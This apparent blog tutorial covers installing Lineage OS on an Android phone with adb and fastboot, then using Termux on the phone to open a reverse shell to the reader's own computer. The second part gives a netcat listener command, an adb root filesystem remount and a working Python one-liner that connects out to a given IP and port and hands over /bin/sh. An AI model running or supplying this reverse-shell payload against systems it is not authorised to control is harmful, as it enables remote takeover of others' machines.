In this post we’ll set up a reverse shell on the Lineage OS Android distribution, but same can be achieved on other distros as well.
First, let’s see how to install Lineage OS on your device. Feel free to skip this section if you’re not interested.
Jailbreak and install Lineage OS
Before you start, you may need to jailbreak your device. Once you’ve done that, follow the steps below to install Lineage OS.
Step 1. Find your device here.
Step 2. Download the builds. For example, for a Moto G7, the builds are available here.
Step 3. Download adb and fastboot and extract the files somewhere on your system. More info here. For example, for Linux, the zip file is available here. Once you have the executables, enable USB debugging on your Android device, connect it to your computer and run adb devices You should see the device on your terminal.
Step 4. Restart the device in fastboot mode by running the command: adb -d reboot bootloader
Step 5. Once the phone boots up, run the command fastboot devices
. You should see the device listed there. If you haven’t unlocked your device, now it’s the time to do it. The Lineage OS website will have the link that you need. For example, for Motorola it’s this one.
Step 6. Now that you’re in fastboot mode, we can start installing the images you downloaded at Step 2. Make sure they’re in the same folder as your adb and fastboot executables. Now run the command fastboot flash boot boot.img
. When it’s done, reboot your Android system and select the Recovery option.
Step 7. Make sure that your partitions are consistent by following the steps outlined here. Basically, you download this zip file, select ApplyUpdate -> Apply from ADB on your Android device and then from your terminal run this command adb -d sideload copy-partitions-20220613-signed.zip
Step 8. Reboot the device, select Recovery mode, then Factory reset -> Format data / factory reset. When it’s done, go back to the main menu, select Apply Update -> Apply from ADB, then run this command on your computer: adb -d sideload lineage-<version>-<build_number>-nightly-<phone_codename>-signed.zip
You’re done installing the OS, now let’s have some fun 🙂
Start a reverse shell on your Android device
You already have a browser, but we need one more thing. (Optional) Visit the F-Droid website on your Android device and install the app.
We’ll need Termux, which is a terminal emulator and a Linux environment app. Open the F-Droid app, search and install the Termux app. You can also install it straight from the Termux website. This will give you access to a lot of Linux executables.
Open the Termux app and run the command pkg install python
Let’s start setting up our reverse shell.
Step 1. Connect your phone, enable USB debugging and run adb devices. Once the device shows up there, we’re ready to start. Set up netcat on your computer (nc -lvp 8448
). From here on, we’ll assume your computer’s IP is 10.0.0.63. Change it to reflect your computer’s address.
Step 2. If you want to have your filesystem fully writable, run
adb root
adb shell mount -o rw,remount /
If you don’t need to, just run adb shell
Step 3. On the Android device, go to where termux has the python executable installed. Try cd /data/data/com.termux/files/usr/bin
or run the command find / -name termux
to locate the Termux’s folder. Now it’s time to connect set up the reverse shell. For this, run the command:
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.63",8448));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
You can find more python payloads here.
Go back to your terminal and voila. You have the reverse shell 🙂
Enjoy!